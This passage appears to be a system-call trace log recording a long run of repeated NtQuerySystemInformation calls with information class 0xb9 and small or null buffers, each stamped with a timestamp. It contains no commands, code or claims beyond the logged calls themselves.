Length=0x0, ResultLength=0x0) [0178.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) 